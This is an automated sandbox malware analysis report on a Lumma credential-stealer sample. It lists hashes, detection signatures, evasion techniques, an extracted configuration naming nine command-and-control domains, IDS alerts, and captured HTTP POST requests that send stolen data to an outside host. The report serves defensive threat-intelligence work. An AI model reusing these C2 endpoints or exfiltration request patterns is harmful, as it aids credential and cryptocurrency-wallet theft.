Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ARoqFi68Nr.exe

Overview

General Information

Sample name:ARoqFi68Nr.exe
renamed because original name is a hash value
Original sample name:d867e39681dbe1564bcdd21d773e668b.exe
Analysis ID:1581229
MD5:d867e39681dbe1564bcdd21d773e668b
SHA1:c8c855e1ff585fdf76e7bb28001fa025a0b201cb
SHA256:d0003288a5022dd1f2af3d6aaec3236c57163e5884cc24909d9175de96c0d734
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • ARoqFi68Nr.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\ARoqFi68Nr.exe" MD5: D867E39681DBE1564BCDD21D773E668B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rebuildeso.buzz", "scentniej.buzz", "mindhandru.buzz", "prisonyfork.buzz", "inherineau.buzz", "appliacnesot.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "screwamusresz.buzz"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: ARoqFi68Nr.exe PID: 7380JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: ARoqFi68Nr.exe PID: 7380JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: ARoqFi68Nr.exe PID: 7380JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T08:52:45.545108+010020283713Unknown Traffic192.168.2.749700104.21.11.101443TCP
              2024-12-27T08:52:47.713609+010020283713Unknown Traffic192.168.2.749702104.21.11.101443TCP
              2024-12-27T08:52:50.224169+010020283713Unknown Traffic192.168.2.749703104.21.11.101443TCP
              2024-12-27T08:52:52.705000+010020283713Unknown Traffic192.168.2.749709104.21.11.101443TCP
              2024-12-27T08:53:01.537276+010020283713Unknown Traffic192.168.2.749733104.21.11.101443TCP
              2024-12-27T08:53:04.266975+010020283713Unknown Traffic192.168.2.749741104.21.11.101443TCP
              2024-12-27T08:53:06.862831+010020283713Unknown Traffic192.168.2.749748104.21.11.101443TCP
              2024-12-27T08:53:12.098083+010020283713Unknown Traffic192.168.2.749763104.21.11.101443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T08:52:46.304703+010020546531A Network Trojan was detected192.168.2.749700104.21.11.101443TCP
              2024-12-27T08:52:48.566284+010020546531A Network Trojan was detected192.168.2.749702104.21.11.101443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T08:52:46.304703+010020498361A Network Trojan was detected192.168.2.749700104.21.11.101443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T08:52:48.566284+010020498121A Network Trojan was detected192.168.2.749702104.21.11.101443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T08:52:51.263028+010020480941Malware Command and Control Activity Detected192.168.2.749703104.21.11.101443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T08:53:06.873316+010028438641A Network Trojan was detected192.168.2.749748104.21.11.101443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: ARoqFi68Nr.exeAvira: detected
              Antivirus detection for URL or domain
              Source: https://mindhandru.buzz/yWAvira URL Cloud: Label: malware
              Source: https://mindhandru.buzz/oAvira URL Cloud: Label: malware
              Source: https://mindhandru.buzz/gAvira URL Cloud: Label: malware
              Source: https://mindhandru.buzz/piOAvira URL Cloud: Label: malware
              Source: https://mindhandru.buzz/apizAvira URL Cloud: Label: malware
              Source: https://mindhandru.buzz/K7Avira URL Cloud: Label: malware
              Source: https://mindhandru.buzz/WAvira URL Cloud: Label: malware
              Source: https://mindhandru.buzz/piwAvira URL Cloud: Label: malware
              Source: https://mindhandru.buzz/apiultiAvira URL Cloud: Label: malware
              Found malware configuration
              Source: ARoqFi68Nr.exe.7380.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "scentniej.buzz", "mindhandru.buzz", "prisonyfork.buzz", "inherineau.buzz", "appliacnesot.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "screwamusresz.buzz"], "Build id": "LOGS11--LiveTraffic"}
              Multi AV Scanner detection for submitted file
              Source: ARoqFi68Nr.exeReversingLabs: Detection: 55%
              Source: ARoqFi68Nr.exeVirustotal: Detection: 52%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: ARoqFi68Nr.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: inherineau.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: scentniej.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: mindhandru.buzz
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString decryptor: LOGS11--LiveTraffic
              Source: ARoqFi68Nr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49748 version: TLS 1.2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49703 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49702 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49702 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.7:49748 -> 104.21.11.101:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: rebuildeso.buzz
              Source: Malware configuration extractorURLs: scentniej.buzz
              Source: Malware configuration extractorURLs: mindhandru.buzz
              Source: Malware configuration extractorURLs: prisonyfork.buzz
              Source: Malware configuration extractorURLs: inherineau.buzz
              Source: Malware configuration extractorURLs: appliacnesot.buzz
              Source: Malware configuration extractorURLs: hummskitnj.buzz
              Source: Malware configuration extractorURLs: cashfuzysao.buzz
              Source: Malware configuration extractorURLs: screwamusresz.buzz
              Source: Joe Sandbox ViewIP Address: 104.21.11.101 104.21.11.101
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49763 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49748 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49741 -> 104.21.11.101:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49733 -> 104.21.11.101:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: mindhandru.buzz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y8OKL05051W3WHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12826Host: mindhandru.buzz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DTLPDGVYJ7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15034Host: mindhandru.buzz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EGAS4F6GYUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20359Host: mindhandru.buzz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0AWTW7811TE3B9RAFWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1228Host: mindhandru.buzz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OQWBW0WO8U7KNWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550868Host: mindhandru.buzz
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: ARoqFi68Nr.exe, 00000000.00000003.1505392610.000000000111F000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1527003067.000000000111D000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1544682245.0000000001120000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1596864489.0000000001128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: ARoqFi68Nr.exe, 00000000.00000003.1389987289.000000000567F000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1389634246.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1388361189.0000000005679000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1388658686.0000000005675000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1475695276.0000000005680000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000002.1598656107.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1597013208.000000000114F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/
              Source: ARoqFi68Nr.exe, 00000000.00000002.1600312441.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1596881692.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/K7
              Source: ARoqFi68Nr.exe, 00000000.00000002.1598656107.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1597013208.000000000114F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/W
              Source: ARoqFi68Nr.exe, 00000000.00000003.1596842855.0000000001130000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1596961059.0000000005682000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1388361189.0000000005679000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1475695276.0000000005680000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000002.1600344046.0000000005682000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501151618.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000002.1598362916.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1544682245.0000000001120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api
              Source: ARoqFi68Nr.exe, 00000000.00000003.1475695276.0000000005680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apiulti
              Source: ARoqFi68Nr.exe, 00000000.00000003.1596961059.0000000005682000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000002.1600344046.0000000005682000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501151618.000000000567A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apiz
              Source: ARoqFi68Nr.exe, 00000000.00000003.1502111690.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501331711.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1505633372.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1475695276.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501151618.000000000567A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/g
              Source: ARoqFi68Nr.exe, 00000000.00000002.1598656107.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1597013208.000000000114F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/o
              Source: ARoqFi68Nr.exe, 00000000.00000003.1526898890.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1530600303.0000000001151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/pi
              Source: ARoqFi68Nr.exe, 00000000.00000002.1598656107.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1597013208.000000000114F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/piO
              Source: ARoqFi68Nr.exe, 00000000.00000003.1544388931.0000000001151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/piw
              Source: ARoqFi68Nr.exe, 00000000.00000003.1502111690.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501331711.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1505633372.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501151618.000000000567A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/yW
              Source: ARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: ARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: ARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
              Source: ARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
              Source: ARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
              Source: ARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: ARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
